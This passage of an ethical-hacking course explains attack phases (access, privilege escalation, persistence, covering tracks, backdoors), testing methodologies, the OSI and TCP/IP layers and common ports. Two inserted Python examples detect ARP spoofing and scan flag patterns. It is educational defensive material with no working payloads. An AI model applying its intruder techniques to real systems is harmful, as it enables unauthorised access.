Unlike the elite black hat hacker who attempts to remain stealth, script  kiddies might even use vulnerability scanners such as Nessus to scan a  victim’s network. Although the activities of the black hat hacker can be  seen as a single shot in the night, the script kiddies scan will appear  as a series of shotgun blasts, as their activity will be loud and  detectable. Programs such as Nessus are designed to find vulnerabilities  but are not designed to be a hacking tool; as such, they generate a  large amount of detectable network traffic. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
The greatest disadvantage of vulnerability scanners is that they are very noisy. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Gaining Access&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
As far as potential damage, this could be considered one of the most  important steps of an attack. This phase of the attack occurs when the  hacker moves from simply probing the network to actually attacking it.  After the hacker has gained access, he can begin to move from system to  system, spreading his damage as he progresses. &lt;br /&gt;
&lt;br /&gt;
Access can be achieved in many different ways. A hacker might find an  open wireless access point that allows him a direct connection or the  help desk might have given him the phone number for a modem used for  out-of-band management. Access could be gained by finding a  vulnerability in the web server’s software. If the hacker is really  bold, he might even walk in and tell the receptionist that he is late  for a meeting and will wait in the conference room with network access.  Pity the poor receptionist who unknowingly provided network access to a  malicious hacker. These things do happen to the company that has failed  to establish good security practices and procedures. &lt;br /&gt;
&lt;br /&gt;
The factors that determine the method a hacker uses to access the network ultimately come down to his skill level, the amount of access he achieves, the network architecture, and the configuration of the victim’s network. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Escalation of Privilege&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Although the hacker is probably happy that he has access, don’t expect  him to stop what he is doing with only a “Joe user” account. Just having  the access of an average user probably won’t give him much control or  access to the network. Therefore, the attacker will attempt to escalate  himself to administrator or root privilege. After all, these are the  individuals who control the network, and that is the type of power the  hacker seeks. &lt;br /&gt;
&lt;br /&gt;
Privilege escalation can best be described as the act of leveraging a  bug or vulnerability in an application or operating system to gain  access to resources that normally would have been protected from an  average user. The end result of privilege escalation is that the  application performs actions that are running within a higher security  context than intended by the designer, and the hacker is granted full  access and control. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Maintaining Access&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Would you believe that hackers are paranoid people? Well, many are, and they worry that their evil deeds might be uncovered. They are diligent at working on ways to maintain access to the systems they have attacked and compromised. They might attempt to pull down the /etc/passwd file or steal other passwords so that they can access other users’ accounts.&lt;br /&gt;
&lt;br /&gt;
Rootkits are one option for hackers. A rootkit is a set of tools used to  help the attacker maintain his access to the system and use it for  malicious purposes. Rootkits have the capability to mask the hacker,  hide his presence, and keep his activity secret. They will be discussed  in detail later on in the class.&lt;br /&gt;
&lt;br /&gt;
Sometimes hackers might even fix the original problem that they used to  gain access, where they can keep the system to themselves. After all,  who wants other hackers around to spoil the fun? Sniffers are yet  another option for the hacker and can be used to monitor the activity of  legitimate users. At this point, hackers are free to upload, download,  or manipulate data as they see fit. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Covering Tracks and Placing Backdoors&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Nothing happens in a void, and that includes computer crime. Hackers are  much like other criminals in that they would like to be sure to remove  all evidence of their activities. This might include using rootkits or  other tools to cover their tracks. Other hackers might hunt down log  files and attempt to alter or erase them. &lt;br /&gt;
&lt;br /&gt;
Hackers must also be worried about the files or programs they leave on  the compromised system. File hiding techniques, such as hidden  directories, hidden attributes, and Alternate Data Streams (ADS), can be  used. As an ethical hacker, you will need to be aware of these tools  and techniques to discover their activities and to deploy adequate  countermeasures. &lt;br /&gt;
&lt;br /&gt;
Backdoors are methods that the hacker can use to reenter the computer at  will. The tools and techniques used to perform such activities are  discussed later on in the class. At this point, what is important is to  identify the steps. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;The Ethical Hacker’s Process&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
As an ethical hacker, you will follow a similar process to the one that an attacker uses. The stages you progress through will map closely to those the hacker uses, but you will work with the permission of the company and will strive to “do no harm.” By ethical hacking and assessing the organization’s strengths and weaknesses, you will perform an important service in helping secure the organization. The ethical hacker plays a key role in the security process. The methodology used to secure an organization can be broken down into five key steps. Ethical hacking is addressed in the first: &lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt; Assessment&lt;blockquote&gt;Ethical hacking, penetration testing, and hands-on security tests.&lt;/blockquote&gt;&lt;/li&gt;
&lt;li&gt; Policy Development&lt;blockquote&gt;Development of policy based on the organization’s goals and mission. The focus should be on the organization’s critical assets. &lt;/blockquote&gt;&lt;/li&gt;
&lt;li&gt; Implementation&lt;blockquote&gt;The building of technical, operational, and managerial controls to secure key assets and data. &lt;/blockquote&gt;&lt;/li&gt;
&lt;li&gt; Training&lt;blockquote&gt;Employees need to be trained as to how to  follow policy and how to configure key security controls, such as  Intrusion Detection Systems (IDS) and firewalls. &lt;/blockquote&gt;&lt;/li&gt;
&lt;li&gt; Audit&lt;blockquote&gt;Auditing involves periodic reviews of the controls  that have been put in place to provide good security. Regulations such  as Health Insurance Portability and Accountability Act (HIPAA) specify  that this should be done yearly.&lt;/blockquote&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
All hacking basically follows the same six-step methodology discussed in  the previous section: reconnaissance, scanning and enumeration, gaining  access, escalation of privilege, maintaining access, and covering  tracks and placing backdoors. &lt;br /&gt;
&lt;br /&gt;
Is this all you need to know about methodologies? No, different organizations have developed diverse ways to address security testing. There are some basic variations you should be aware of. These include National Institute of Standards and Technology 800-42, the Threat and Risk Assessment Working Guide, Operational Critical Threat, Asset, and Vulnerability Evaluation, and the Open Source Security Testing Methodology Manual. Each is discussed next. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;National Institute of Standards and Technology (NIST)&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
The NIST 800-42 method of security assessment is broken down into four basic stages that include:&lt;br /&gt;
&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt; Planning&lt;/li&gt;
&lt;li&gt; Discovery&lt;/li&gt;
&lt;li&gt; Attack&lt;/li&gt;
&lt;li&gt; Reporting&lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
NIST has developed many standards and practices for good security. This  methodology is contained in NIST 800-42. This is just one of several  documents available to help guide you through an assessment. Find out  more at &lt;a href="http://csrc.nist.gov/publications/nistpubs" target="_blank"&gt;http://csrc.nist.gov/publications/nistpubs&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Threat and Risk Assessment Working Guide (TRAWG)&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
The Threat and Risk Assessment Working Guide provides guidance to  individuals or teams carrying out a Threat and Risk Assessment (TRA) for  an existing or proposed IT system. This document helps provide IT  security guidance and helps the user determine which critical assets are  most at risk within that system and develop recommendations for  safeguards. Find out more at &lt;a href="http://www.cse-cst.gc.ca/publications/gov-pubs/itsg/itsg04-e.html" target="_blank"&gt;http://www.cse-cst.gc.ca/publication.../itsg04-e.html&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Operational Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
OCTAVE focuses on organizational risk and strategic, practice-related issues. OCTAVE is driven by operational risk and security practices. OCTAVE is self-directed by a small team of people from the organization’s operational and business units and the IT department. The goal of OCTAVE is to get departments to work together to address the security needs of the organization. The team uses the experience of existing employees to define security, identify risks, and build a robust security strategy. Find out more at &lt;a href="http://www.cert.org/octave" target="_blank"&gt;www.cert.org/octave&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Open Source Security Testing Methodology Manual (OSSTMM)&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
One well-known open source methodology is the OSSTMM. The OSSTMM divides security assessment into six key points known as sections. They are as follows: &lt;br /&gt;
&lt;br /&gt;
* Physical Security &lt;br /&gt;
* Internet Security &lt;br /&gt;
* Information Security &lt;br /&gt;
* Wireless Security &lt;br /&gt;
* Communications Security &lt;br /&gt;
* Social Engineering &lt;br /&gt;
&lt;br /&gt;
The OSSTMM gives metrics and guidelines as to how many man-hours a  particular assessment will require. Anyone serious about learning more  about security assessment should review this documentation. The OSSTMM  outlines what to do before, during, and after a security test. Find out  more at &lt;a href="http://www.isecom.org/osstmm" target="_blank"&gt;www.isecom.org/osstmm&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Security and the Stack&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
To really understand many of the techniques and tools that hackers use, you need to understand how systems and devices communicate. Hackers understand this, and many think outside the box when planning an attack or developing a hacking tool. As an example, TCP uses flags to communicate, but what if a hacker sends TCP packets with no flags set? Sure, it breaks the rules of the protocol, but it might allow the attacker to elicit a response that helps identify the server. As you can see, knowing how a protocol, service, or application works and how it can be manipulated can be beneficial. &lt;br /&gt;
&lt;br /&gt;
The OSI model and TCP/IP are discussed in the next sections. Pay careful  attention to the function of each layer of the stack, and think about  what role each layer plays in the communication process. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;The OSI Model&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Understand the Open Systems Interconnect (OSI) Model &lt;br /&gt;
&lt;br /&gt;
Once upon a time, the world of network protocols was much like the Wild  West. Everyone kind of did their own thing, and if there were trouble,  there would be a shoot-out on Main Street. Trouble was, you never knew  whether you were going to get hit by a stray bullet. Luckily, the IT  equivalent of the sheriff came to town. This was the International  Standards Organization (ISO). The ISO was convinced that there needed to  be order and developed the Open Systems Interconnect (OSI) model in  1984. The model is designed to provide order by specifying a specific  hierarchy in which each layer builds on the output of each adjacent  layer. Although its role as sheriff was not widely accepted by all, the  model is still used today as a guide to describe the operation of a  networking environment. &lt;br /&gt;
&lt;br /&gt;
There are seven layers of the OSI model: the Application, Presentation,  Session, Transport, Network, Data Link, and Physical layers. The seven  layers of the OSI model are shown in Figure 2.1, which overviews data  moving between two systems up and down the stack, and described in the  following list: &lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image002.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
Application layer&lt;blockquote&gt;Layer 7 is known as the Application layer. Recognized as the top layer of the OSI model, this layer serves as the window for application services. The Application layer is the one most users are familiar with, as it is the home of email programs, FTP, Telnet, web browsers, and office productivity suites, as well as many other applications. It is also the home of many malicious programs such as viruses, worms, Trojan horse programs, and other virulent applications. &lt;/blockquote&gt;
Presentation layer&lt;blockquote&gt;Layer 6 is known as the Presentation layer. The Presentation layer is responsible for taking data that has been passed up from lower levels and putting it into a format that Application layer programs can understand. These common formats include American Standard Code for Information Interchange (ASCII), Extended Binary-Coded Decimal Interchange Code (EBCDIC), and American National Standards Institute (ANSI). From a security standpoint, the most critical process handled at this layer is encryption and decryption. If properly implemented, this can help secure data in transit. &lt;/blockquote&gt;
Session layer&lt;blockquote&gt;Layer 5 is known as the Session layer. Its functionality is put to use when creating, controlling, or shutting down a TCP session. Items such as TCP connection establishment and TCP connection teardown occur here. Session-layer protocols include items such as Remote Procedure Call and SQLNet from Oracle. From a security standpoint, the Session layer is vulnerable to attacks such as session hijacking. A session hijack can occur when a legitimate user has his session stolen by a hacker. This will be discussed in detail in lesson 7, "Sniffers, Session Hijacking, and Denial of Service". &lt;/blockquote&gt;
Transport layer&lt;blockquote&gt;Layer 4 is known as the Transport layer. The Transport layer ensures completeness by handling end-to-end error recovery and flow control. Transport-layer protocols include TCP, a connection-oriented protocol that provides reliable communication through the use of handshaking, acknowledgments, error detection, and session teardown, as well as the User Datagram Protocol (UDP), a connectionless protocol. UDP offers speed and low overhead as its primary advantage. Security concerns at the transport level include Synchronize (SYN) attacks, Denial of Service (DoS), and buffer overflows. &lt;/blockquote&gt;
Network layer&lt;blockquote&gt;Layer 3 is known as the Network layer. This layer is concerned with logical addressing and routing. The Network layer is the home of the Internet Protocol (IP), which makes a best effort at delivery of datagrams from their source to their destination. Security concerns at the network level include route poisoning, DoS, spoofing, and fragmentation attacks. Fragmentation attacks occur when hackers manipulate datagram fragments to overlap in such a way as to crash the victim’s computer. IPSec is a key security service that is available at this layer. &lt;/blockquote&gt;
Data Link layer&lt;blockquote&gt;Layer 2 is known as the Data Link layer. The Data Link layer is responsible for formatting and organizing the data before sending it to the Physical layer. The Data Link layer organizes the data into frames. A frame is a logical structure in which data can be placed; it’s a packet on the wire. When a frame reaches the target device, the Data Link layer is responsible for stripping off the data frame and passing the data packet up to the Network layer. The Data Link layer is made up of two sublayers, the logical link control layer (LLC) and the media access control layer (MAC). You might be familiar with the MAC layer, as it shares its name with the MAC addressing scheme. These 6-byte (48-bit) addresses are used to uniquely identify each device on the local network. A major security concern of the Data Link layer is the Address Resolution Protocol (ARP) process. ARP is used to resolve known Network layer addresses to unknown MAC addresses. ARP is a trusting protocol and, as such, can be used by hackers for ARP poisoning, which can allow them access to traffic on switches they should not have. &lt;/blockquote&gt;
Physical layer&lt;blockquote&gt;Layer 1 is known as the Physical layer. At Layer 1, bit-level communication takes place. The bits have no defined meaning on the wire, but the Physical layer defines how long each bit lasts and how it is transmitted and received. From a security standpoint, you must be concerned any time a hacker can get physical access. By accessing a physical component of a computer network, such as a computer, switch, or cable, the attacker might be able to use a hardware or software packet sniffer to monitor traffic on that network. Sniffers enable attackers to capture and decode packets. If no encryption is being used, a great deal of sensitive information might be directly available to the hacker. &lt;/blockquote&gt;&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
For the exam, make sure that you know which attacks and defenses are located on each layer. &lt;br /&gt;
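The Data Link layer entry above calls ARP a trusting protocol. The usual defensive control on a segment is to watch ARP replies and alert when an IP address that was already bound to one MAC starts answering from another. The detector below is an added example, not code from the article; the ARP replies it consumes are constructed in the script with made-up addresses.&lt;br /&gt;

```python
"""Alert on IP-to-MAC binding changes observed in ARP replies.

Added example, not from the original article. Packets follow the RFC 826
layout for Ethernet/IPv4 ARP; all addresses below are constructed samples.
"""
import struct

ARP_REPLY = 2  # ARP operation code for a reply


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Construct a 28-byte ARP reply from dotted MAC/IP strings (sample data only)."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1, 0x0800, 6, 4, ARP_REPLY,
        bytes.fromhex(sender_mac.replace(":", "")),
        bytes(map(int, sender_ip.split("."))),
        bytes.fromhex(target_mac.replace(":", "")),
        bytes(map(int, target_ip.split("."))),
    )


def parse_arp(packet):
    """Decode the fixed ARP header into a dict of printable fields."""
    _, _, _, _, oper, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", packet[:28])
    return {
        "oper": oper,
        "sha": sha.hex(":"), "spa": ".".join(str(b) for b in spa),
        "tha": tha.hex(":"), "tpa": ".".join(str(b) for b in tpa),
    }


class ArpWatch:
    """Remember the first MAC seen for each IP and report any later change."""

    def __init__(self):
        self.table = {}   # IP string -> MAC string first seen
        self.alerts = []  # every alert raised so far

    def observe(self, packet):
        """Feed one ARP packet; return an alert string or None."""
        arp = parse_arp(packet)
        if arp["oper"] != ARP_REPLY:
            return None
        known = self.table.get(arp["spa"])
        if known is None:
            self.table[arp["spa"]] = arp["sha"]
            return None
        if known != arp["sha"]:
            alert = "%s moved from %s to %s" % (arp["spa"], known, arp["sha"])
            self.alerts.append(alert)
            return alert
        return None


def run_sample():
    """Replay three constructed replies: two consistent, then a rebinding."""
    watch = ArpWatch()
    gateway_ip, host_mac, host_ip = "192.0.2.1", "02:00:00:00:00:10", "192.0.2.10"
    replies = [
        build_arp_reply("02:00:00:00:00:01", gateway_ip, host_mac, host_ip),
        build_arp_reply("02:00:00:00:00:01", gateway_ip, host_mac, host_ip),
        build_arp_reply("02:00:00:00:00:99", gateway_ip, host_mac, host_ip),
    ]
    return [watch.observe(p) for p in replies]


if __name__ == "__main__":
    for result in run_sample():
        print(result or "binding consistent")
```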
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Anatomy of TCP/IP Protocols&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objectives:&lt;/b&gt; &lt;br /&gt;
Have a basic knowledge of the Transmission Control Protocol/Internet Protocol (TCP/IP) and their functionality &lt;br /&gt;
Describe the basic TCP/IP frame structure &lt;br /&gt;
&lt;br /&gt;
Four main protocols form the core of TCP/IP: the Internet Protocol (IP),  the Transmission Control Protocol (TCP), the User Datagram Protocol  (UDP), and the Internet Control Message Protocol (ICMP). These protocols  are essential components that must be supported by every device that  communicates on a TCP/IP network. Each serves a distinct purpose and is  worthy of further discussion. The four layers of the TCP/IP stack are  shown in Figure 2.2. The figure lists the Application, Host-to-host,  Internet, and Network Access layers and describes the function of each. &lt;br /&gt;
&lt;br /&gt;
TCP/IP is the foundation of all modern networks. In many ways, you can say that TCP/IP has grown up along with the development of the Internet. Its history can be traced back to standards adopted by the U.S. government’s Department of Defense (DoD) in 1982. Originally, the TCP/IP model was developed as a flexible, fault-tolerant set of protocols that were robust enough to avoid failure should one or more nodes go down. After all, the network was designed to these specifications to withstand a nuclear strike, which might destroy key routing nodes. The designers of this original network never envisioned the Internet we use today. Because TCP/IP was designed to work in a trusted environment, many TCP/IP protocols are now considered insecure. As an example, Telnet is designed to mask the password on the user’s screen, as the designers didn’t want shoulder surfers stealing a password; however, the password is sent in clear text on the wire. Little concern was ever given to the fact that an untrustworthy party might have access to the wire and be able to sniff the clear text password. Most networks today run TCP/IPv4. Many security mechanisms in TCP/IPv4 are add-ons to the original protocol suite. As the layers are stacked one atop another, encapsulation takes place. Encapsulation is the technique of layering protocols in which one layer adds a header to the information from the layer above. An example of this can be seen in Figure 2.3. This screenshot from a sniffer program has UDP highlighted.&lt;br /&gt;
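As an added example (not code from the article), the parser below walks a constructed Ethernet/IPv4/TCP frame down the stack the way the encapsulation paragraph above describes: each layer strips its own header and hands the rest up. At the Transport layer it also checks the flag byte for the no-flags packet mentioned under Security and the Stack, and goes a little beyond the article by labelling two other contradictory flag sets (SYN with FIN, and FIN/PSH/URG together). MAC addresses, IPs, ports and the payload are all made-up sample values.&lt;br /&gt;

```python
"""Decapsulate a constructed Ethernet/IPv4/TCP frame and classify its TCP flags.

Added example, not from the original article. Header layouts follow RFC 791
(IPv4) and RFC 793 (TCP); all addresses and the payload are sample values.
"""
import struct

# TCP flag bit positions in the flags byte (RFC 793).
TCP_FLAGS = {"FIN": 0, "SYN": 1, "RST": 2, "PSH": 3, "ACK": 4, "URG": 5}


def bit(value, n):
    """Isolate bit n of value using shift and modulo."""
    return (value >> n) % 2


def parse_ethernet(frame):
    """Layer 2: 14-byte header (dst MAC, src MAC, EtherType); the rest is the payload."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return {"dst": dst.hex(":"), "src": src.hex(":"), "ethertype": ethertype}, frame[14:]


def parse_ipv4(packet):
    """Layer 3: header length from the IHL nibble; protocol 6 means TCP follows."""
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl % 16) * 4
    header = {"version": ver_ihl >> 4, "ihl": ihl, "proto": proto,
              "src": ".".join(str(b) for b in src), "dst": ".".join(str(b) for b in dst)}
    return header, packet[ihl:total_len]


def parse_tcp(segment):
    """Layer 4: ports, data offset and the six classic flag bits."""
    sport, dport, _, _, off_res, flags = struct.unpack("!HHIIBB", segment[:14])
    data_offset = (off_res >> 4) * 4
    set_flags = [name for name, n in TCP_FLAGS.items() if bit(flags, n)]
    return {"sport": sport, "dport": dport, "flags": set_flags}, segment[data_offset:]


def classify_flags(set_flags):
    """Label flag combinations a defender would want an IDS to alert on."""
    s = set(set_flags)
    if not s:
        return "null-scan: no flags set"
    if {"SYN", "FIN"} == s:
        return "syn-fin: contradictory flags"
    if {"FIN", "PSH", "URG"} == s:
        return "xmas-scan"
    return "normal"


def decapsulate(frame):
    """Return each layer's header, the application payload and a flag verdict."""
    eth, ip_bytes = parse_ethernet(frame)
    ip, tcp_bytes = parse_ipv4(ip_bytes)
    tcp, payload = parse_tcp(tcp_bytes)
    return {"ethernet": eth, "ip": ip, "tcp": tcp, "payload": payload,
            "verdict": classify_flags(tcp["flags"])}


def build_frame(flags, payload=b"hello"):
    """Construct a sample frame around the given TCP flags byte (values are made up)."""
    # 20-byte TCP header: data offset 5 words (0x50), window 8192, no options.
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 0x50, flags, 8192, 0, 0) + payload
    # 20-byte IPv4 header: version 4 / IHL 5 (0x45), TTL 64, protocol 6 (TCP).
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20])) + tcp
    # 14-byte Ethernet header with EtherType 0x0800 (IPv4).
    eth = struct.pack("!6s6sH", bytes.fromhex("020000000001"),
                      bytes.fromhex("020000000002"), 0x0800)
    return eth + ip


if __name__ == "__main__":
    for flags in (0x12, 0x00, 0x03, 0x29):
        result = decapsulate(build_frame(flags))
        print(result["ip"]["src"], "->", result["ip"]["dst"],
              result["tcp"]["flags"], result["verdict"])
```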
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image004.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image006.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
A lot of free packet sniffing utilities are available on the Internet.  Consider evaluating Packetyzer for Windows or Ethereal for Linux. There  are also many commercial sniffing tools, such as Sniffer by Network  General. These tools can help you learn more about encapsulation and  packet structure. &lt;br /&gt;
&lt;br /&gt;
Let’s take a look at each of the four layers of TCP/IP and discuss some of the security concerns associated with each layer and specific protocols. The four layers of TCP/IP include &lt;br /&gt;
&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt; The Application layer&lt;/li&gt;
&lt;li&gt; The Host-to-host layer&lt;/li&gt;
&lt;li&gt; The Internet layer&lt;/li&gt;
&lt;li&gt; The Network access layer&lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
&lt;h3 class="articleheading"&gt;The Application Layer&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Describe application ports and how they are numbered &lt;br /&gt;
&lt;br /&gt;
The Application layer sits at the top of the protocol stack. This layer is responsible for application support. Applications are typically mapped not by name, but by their corresponding port. Ports are placed into TCP and UDP packets so that the correct application can be passed to the required protocols below. &lt;br /&gt;
&lt;br /&gt;
Although a particular service might have an assigned port, nothing  specifies that services cannot listen on another port. A common example  of this is Simple Mail Transfer Protocol (SMTP). The assigned port of  this is 25. Your cable company might block port 25 in an attempt to keep  you from running a mail server on your local computer; however, nothing  prevents you from running your mail server on another local port. The  primary reason services have assigned ports is so that a client can  easily find that service on a remote host. As an example, FTP servers  listen at port 21, and Hypertext Transfer Protocol (HTTP) servers listen  at port 80. Client applications, such as a File Transfer Protocol (FTP)  program or browser, use randomly assigned ports typically greater than  1023. &lt;br /&gt;
&lt;br /&gt;
There are approximately 65,000 ports; they are divided into well-known  ports (0–1023), registered ports (1024–49151), and dynamic ports  (49152–65535). Although there are hundreds of ports and corresponding  applications in practice, less than a hundred are in common use. The  most common of these are shown in Table 2.1. These are some of the ports  that a hacker would look for first on a victim’s computer systems. &lt;br /&gt;
&lt;br /&gt;
TABLE 2.1 Common Ports and Protocols &lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 354px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;Port   Service      Protocol
21       FTP           TCP 
22       SSH           TCP 
23       Telnet        TCP 
25       SMTP          TCP 
53       DNS           TCP/UDP 
67/68    DHCP          UDP 
69       TFTP          UDP 
79       Finger        TCP 
80       HTTP          TCP 
88       Kerberos      UDP 
110      POP3          TCP 
111      SUNRPC        TCP/UDP 
135      MS RPC        TCP/UDP 
139      NB Session    TCP/UDP 
161      SNMP          UDP 
162      SNMP Trap     UDP 
389      LDAP          TCP 
443      SSL           TCP 
445      SMB over IP   TCP/UDP 
1433     MS-SQL        TCP&lt;/pre&gt;&lt;/div&gt;Blocking these ports if they are not needed is a good idea, but  it’s better to practice the principle of least privilege. The principle  of least privilege means that you give an entity the least amount of  access only to perform its job and nothing more. If a port is not being  used, it should be closed. Remember that security is a never ending  process; just because the port is closed today, doesn’t mean that it  will be closed tomorrow. You will want to periodically test for open  ports. Not all applications are created equally. Although some, such as  SSH, are relatively secure, others, such as Telnet, are not. &lt;br /&gt;
&lt;br /&gt;
The following list discusses the operation and security issues of some of the common applications: &lt;br /&gt;
&lt;br /&gt;
File Transfer Protocol (FTP)&lt;blockquote&gt;FTP is a TCP service and operates on ports 20 and 21. This application is used to move files from one computer to another. Port 20 is used for the data stream and transfers the data between the client and the server. Port 21 is the control stream and is used to pass commands between the client and the FTP server. Attacks on FTP target misconfigured directory permissions and compromised or sniffed clear-text passwords. FTP is one of the most commonly hacked services. &lt;/blockquote&gt;Telnet&lt;blockquote&gt;Telnet is a TCP service that operates on port 23. Telnet enables a client at one site to establish a session with a host at another site. The program passes the information typed at the client’s keyboard to the host computer system. Although Telnet can be configured to allow anonymous connections, it should be configured to require usernames and passwords. Unfortunately, even then, Telnet sends them in clear text. When a user is logged in, he or she can perform any allowed task. Applications, such as Secure Shell (SSH), should be considered as a replacement. SSH is a secure replacement for Telnet and does not pass cleartext usernames and passwords. &lt;/blockquote&gt;Simple Mail Transfer Protocol (SMTP)&lt;blockquote&gt;This application is a TCP service that operates on port 25. It is designed for the exchange of electronic mail between networked systems. Messages sent through SMTP have two parts: an address header and the message text. All types of computers can exchange messages with SMTP. Spoofing and spamming are two of the vulnerabilities associated with SMTP. &lt;/blockquote&gt;Domain Name Service (DNS)&lt;blockquote&gt;This application operates on port 53 and performs address translation. Although we sometimes overlook the role DNS plays, it serves a critical function in that it converts fully qualified domain names (FQDNs) into numeric IP addresses or IP addresses into FQDNs. 
If someone were to bring down DNS, the Internet would continue to function, but it would require that Internet users know the IP address of every site they want to visit. For all practical purposes, the Internet would not be usable without DNS. &lt;/blockquote&gt;The DNS database consists of one or more zone files. Each zone is a collection of structured resource records. Common record types include the Start of Authority (SOA) record, A record, CNAME record, NS record, PTR record, and the MX record. There is only one SOA record in each zone database file. It describes the zone name space. The A record is the most common, as it contains IP addresses and names of specific hosts. The CNAME record is an alias. For example, the outlaw William H. Bonney went by the alias of Billy the Kid. The NS record lists the IP address of other name servers. An MX record is a mail exchange record. This record has the IP address of the server where email should be delivered. Hackers can target DNS servers with many types of attacks. One such attack is DNS cache poisoning. This type of attack sends fake entries to a DNS server to corrupt the information stored there. DNS can also be susceptible to DoS attacks and to unauthorized zone transfers. DNS uses UDP for DNS queries and TCP for zone transfers. &lt;br /&gt;
&lt;br /&gt;
Trivial File Transfer Protocol (TFTP)&lt;blockquote&gt;TFTP operates on port 69. It is considered a down-and-dirty version of FTP as it uses UDP to cut down on overhead. It not only does so without the session management offered by TCP, but it also requires no authentication, which could pose a big security risk. It is used to transfer router configuration files and by cable companies to configure cable modems. TFTP is a favorite of hackers and has been used by programs, such as the Nimda worm, to move data without having to input usernames or passwords. &lt;/blockquote&gt;Hypertext Transfer Protocol (HTTP)&lt;blockquote&gt;HTTP is a TCP service that operates on port 80. This is one of the most well-known applications. HTTP has helped make the Web the popular protocol it is today. The HTTP connection model is known as a stateless connection. HTTP uses a request response protocol in which a client sends a request and a server sends a response. Attacks that exploit HTTP can target the server, browser, or scripts that run on the browser. Code Red is an example of code that targeted a web server. &lt;/blockquote&gt;Simple Network Management Protocol (SNMP)&lt;blockquote&gt;SNMP is a UDP service and operates on ports 161 and 162. It was envisioned to be an efficient and inexpensive way to monitor networks. The SNMP protocol allows agents to gather information, including network statistics, and report back to their management stations. Most large corporations have implemented some type of SNMP management. Some of the security problems that plague SNMP are caused by the fact that community strings can be passed as clear text and that the default community strings (public/private) are well known. SNMP version 3 is the most current, and it offers encryption for more robust security. &lt;/blockquote&gt;&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
A basic understanding of these applications’ strengths and weaknesses will be needed for the exam. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;The Host-to-Host Layer&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objectives:&lt;/b&gt; &lt;br /&gt;
Describe the TCP packet structure &lt;br /&gt;
Know the TCP flags and their meaning &lt;br /&gt;
Understand how UDP differs from TCP &lt;br /&gt;
&lt;br /&gt;
The host-to-host layer provides end-to-end delivery. Two primary protocols are located at the host-to-host layer: Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Transmission Control Protocol (TCP)&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
